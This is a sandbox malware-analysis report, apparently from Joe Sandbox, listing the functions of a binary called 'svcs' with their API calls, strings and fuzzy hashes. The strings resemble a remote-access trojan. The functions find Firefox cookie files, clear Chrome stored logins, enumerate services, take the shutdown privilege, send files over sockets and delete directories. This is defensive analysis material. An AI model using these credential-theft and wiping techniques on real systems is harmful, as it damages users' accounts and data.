                                • Opcode Fuzzy Hash: a3f0521951bb9342bb967e70cc438d07290dcccf7f3efa3b8b817ec6fb2293fa
                                • Instruction Fuzzy Hash: 1D115172D04218BAD710E6959C45ADEB7A89B08714F15007BF904B2282E77CAA4486BA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041A748 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                Download Yara Rule
                                APIs
                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
                                • GetLastError.KERNEL32 ref: 0041A7BB
                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                • String ID:
                                • API String ID: 3587775597-0
                                • Opcode ID: f0a508092aeabfb754dac70d46392ce52f729929a0f06f3e8fb072e170aa9964
                                • Instruction ID: 0905bbee584710e72bd43cf86ffd47af08151029a50ddcda7611e9b1cb6672f7
                                • Opcode Fuzzy Hash: f0a508092aeabfb754dac70d46392ce52f729929a0f06f3e8fb072e170aa9964
                                • Instruction Fuzzy Hash: A1815F71104305ABC304EB61D885DAFB7A8FF94749F50092FF585521A2EF78EE48CB9A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00419AF5 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 245fileCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileW.KERNEL32(00000000,?), ref: 00419D4B
                                • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419E17
                                  • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Find$CreateFirstNext
                                • String ID: (eF$8SG$PXG$PXG$NG$PG
                                • API String ID: 341183262-875132146
                                • Opcode ID: 1dfe3cfc7b79d75524d00d8ccab6f132fb387ae8ec27b841a732b59c95e35a52
                                • Instruction ID: 96038134cf9b6260143958ba34f432c8b7c7433700823f8ab46a3e18139dd1a2
                                • Opcode Fuzzy Hash: 1dfe3cfc7b79d75524d00d8ccab6f132fb387ae8ec27b841a732b59c95e35a52
                                • Instruction Fuzzy Hash: D48152315083415AC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00452610 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                                • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045271C
                                • IsValidCodePage.KERNEL32(00000000), ref: 00452777
                                • IsValidLocale.KERNEL32(?,00000001), ref: 00452786
                                • GetLocaleInfoW.KERNEL32(?,00001001,lJD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
                                • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 004527ED
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                • String ID: lJD$lJD$lJD
                                • API String ID: 745075371-479184356
                                • Opcode ID: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                • Instruction ID: 5597d49bf91f8be5c1e88387600e3254545b136a20640e737b6730ed74bf2304
                                • Opcode Fuzzy Hash: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                • Instruction Fuzzy Hash: 87518371900205ABDF10DFA5CD41ABF77B8AF19702F14047BFD04E7292E7B899488B69
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040C34D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
                                • FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
                                • FindClose.KERNEL32(00000000), ref: 0040C47D
                                • FindClose.KERNEL32(00000000), ref: 0040C4A8
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$CloseFile$FirstNext
                                • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                • API String ID: 1164774033-405221262
                                • Opcode ID: f210557bed675ad5d36221f6052a79efeb781c0a156dbb9e3500e3c2c137b3c7
                                • Instruction ID: 975c513e22faa42ee1994afe11ceef4a5d9ff9fa3a88a4f7cb3cdca8b35e8719
                                • Opcode Fuzzy Hash: f210557bed675ad5d36221f6052a79efeb781c0a156dbb9e3500e3c2c137b3c7
                                • Instruction Fuzzy Hash: 4131513150021AA6CB14E7A1DC9ADFE7778AF10718F10017FB105B20D2EF789A49CA4D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041C291 Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C2EC
                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C31C
                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00474EE0,?), ref: 0041C38E
                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C39B
                                  • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C371
                                • GetLastError.KERNEL32(?,?,?,?,?,00474EE0,?), ref: 0041C3BC
                                • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D2
                                • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D9
                                • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3E2
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                • String ID:
                                • API String ID: 2341273852-0
                                • Opcode ID: 5daa9100e03deb39a4691b7b17906df9641a5acb862147602035c05749f1dd0e
                                • Instruction ID: c19bc5cae20e4253aafd1d57f534f4f4794eeb6ee7264df4fdb3445c687e6cd6
                                • Opcode Fuzzy Hash: 5daa9100e03deb39a4691b7b17906df9641a5acb862147602035c05749f1dd0e
                                • Instruction Fuzzy Hash: 1331827294031CAADB24E7A1DC88EDB736CAF04305F4405FBF955D2152EB39DAC88B68
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040880C Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 186fileCOMMON
                                Download Yara Rule
                                APIs
                                • __EH_prolog.LIBCMT ref: 00408811
                                • FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                • String ID: hdF
                                • API String ID: 1771804793-665520524
                                • Opcode ID: e4bf9b104c2a4932abe6be63e8df5bb1645f0ee96392f376ac585c53c850bca5
                                • Instruction ID: 1e810be39857a3d86828f92fa26e793a4655b35e172fafea17edde612d57cc14
                                • Opcode Fuzzy Hash: e4bf9b104c2a4932abe6be63e8df5bb1645f0ee96392f376ac585c53c850bca5
                                • Instruction Fuzzy Hash: 16515F72900209AACF04FB61DD569ED7778AF11308F50417FB946B61E2EF389B48CB99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004167B4 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 97libraryloadershutdownCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                  • Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                  • Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                  • Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                  • Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D
                                • ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
                                • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 0041686B
                                • GetProcAddress.KERNEL32(00000000), ref: 00416872
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                • String ID: !D@$PowrProf.dll$SetSuspendState
                                • API String ID: 1589313981-2876530381
                                • Opcode ID: 06b2ed81386eea833f57913314ae7cc45cedb7ecee8fca0ea64c9477fec69274
                                • Instruction ID: 15d3ae9bc4d358b9de40311b9e813ebd0b85961e95f80c383f5c7d57e5fc9640
                                • Opcode Fuzzy Hash: 06b2ed81386eea833f57913314ae7cc45cedb7ecee8fca0ea64c9477fec69274
                                • Instruction Fuzzy Hash: 6E21617060430256CB14FBB68856AAE63599F41788F41487FB442A72D3EF3CD845CBAE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0045243C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524D5
                                • GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524FE
                                • GetACP.KERNEL32(?,?,0045275B,?,00000000), ref: 00452513
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: InfoLocale
                                • String ID: ACP$OCP$['E
                                • API String ID: 2299586839-2532616801
                                • Opcode ID: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                • Instruction ID: 65f7b5195a5790e2d5819d7d4b0c6b76a8aa59636dcad79128a037cfc813d78c
                                • Opcode Fuzzy Hash: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                • Instruction Fuzzy Hash: FD21F432600104A7DB348F54CF00AA773A6EB47B1AB168567EC09D7302F7BADD48C398
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040BA12 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                Download Yara Rule
                                APIs
                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
                                • GetLastError.KERNEL32 ref: 0040BA58
                                Strings
                                • UserProfile, xrefs: 0040BA1E
                                • [Chrome StoredLogins not found], xrefs: 0040BA72
                                • [Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
                                • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: DeleteErrorFileLast
                                • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                • API String ID: 2018770650-1062637481
                                • Opcode ID: 7df5978969732fb09709de34775d6ce1a623c26fc4145e618767f27fcf07f662
                                • Instruction ID: af402a2c9819bc64f7c9913ab42ffc044d60d1b3c88a69bbc3d4df1d4d30a246
                                • Opcode Fuzzy Hash: 7df5978969732fb09709de34775d6ce1a623c26fc4145e618767f27fcf07f662
                                • Instruction Fuzzy Hash: 2D01A7B17801056AC70477B6CD5B9BE77249911704F50057FF802725E2FE7D59098ADE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00417952 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                • OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                • GetLastError.KERNEL32 ref: 0041799D
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                • String ID: SeShutdownPrivilege
                                • API String ID: 3534403312-3733053543
                                • Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                • Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
                                • Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                • Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00409253 Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
                                Download Yara Rule
                                APIs
                                • __EH_prolog.LIBCMT ref: 00409258
                                  • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,?,?), ref: 004048E0
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
                                • FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
                                • FindClose.KERNEL32(00000000), ref: 004093C1
                                  • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,00000000,00000000,?,00474EF8,?), ref: 00404E38
                                  • Part of subcall function 00404E26: SetEvent.KERNEL32(00000000), ref: 00404E43
                                  • Part of subcall function 00404E26: FindCloseChangeNotification.KERNELBASE(00000000), ref: 00404E4C
                                • FindClose.KERNEL32(00000000), ref: 004095B9
                                  • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
                                  • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$Close$EventFileObjectSingleWait$ChangeException@8FirstH_prologNextNotificationThrowconnectsend
                                • String ID:
                                • API String ID: 2435342581-0
                                • Opcode ID: f9045dcdb2f3133ff8fba91c5ff4e6bf62ac57e12963de0168c3bd7490a17388
                                • Instruction ID: 125c9cc0036adb3739497efb01147483584b5989e706bb19fe9a4109aadf0594
                                • Opcode Fuzzy Hash: f9045dcdb2f3133ff8fba91c5ff4e6bf62ac57e12963de0168c3bd7490a17388
                                • Instruction Fuzzy Hash: DCB18D32900109AACB14EBA1DD96AED7779AF04318F10417FF506B60E2EF785E49CB98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040F7A7 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00413549: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00000000), ref: 00413569
                                  • Part of subcall function 00413549: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 00413587
                                  • Part of subcall function 00413549: RegCloseKey.ADVAPI32(00000000), ref: 00413592
                                • Sleep.KERNEL32(00000BB8), ref: 0040F85B
                                • ExitProcess.KERNEL32 ref: 0040F8CA
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseExitOpenProcessQuerySleepValue
                                • String ID: 4.9.4 Pro$override$pth_unenc
                                • API String ID: 2281282204-930821335
                                • Opcode ID: dc16a9e0874cea99cd6dbe969c2e4899a966a5c348296f3374b49b5e23af8a6f
                                • Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
                                • Opcode Fuzzy Hash: dc16a9e0874cea99cd6dbe969c2e4899a966a5c348296f3374b49b5e23af8a6f
                                • Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040783C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 86fileCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
                                • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileFind$FirstNextsend
                                • String ID: (eF$XPG$XPG
                                • API String ID: 4113138495-1496965907
                                • Opcode ID: 7493802b9fea3f653f5859ff7eede1918c289d9ff4253d111e6d79fb62445a1f
                                • Instruction ID: 6b6d716c6ecdfe6ec78918620e47e684a121d368db73a1555a51ac38f2ecb6eb
                                • Opcode Fuzzy Hash: 7493802b9fea3f653f5859ff7eede1918c289d9ff4253d111e6d79fb62445a1f
                                • Instruction Fuzzy Hash: 212195325083419BC314FB61D855DEFB3ACAF90358F40493EF696621E1EF78AA09C65B
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00409665 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
                                Download Yara Rule
                                APIs
                                • __EH_prolog.LIBCMT ref: 0040966A
                                • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
                                • FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
                                • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstH_prologNext
                                • String ID:
                                • API String ID: 1157919129-0
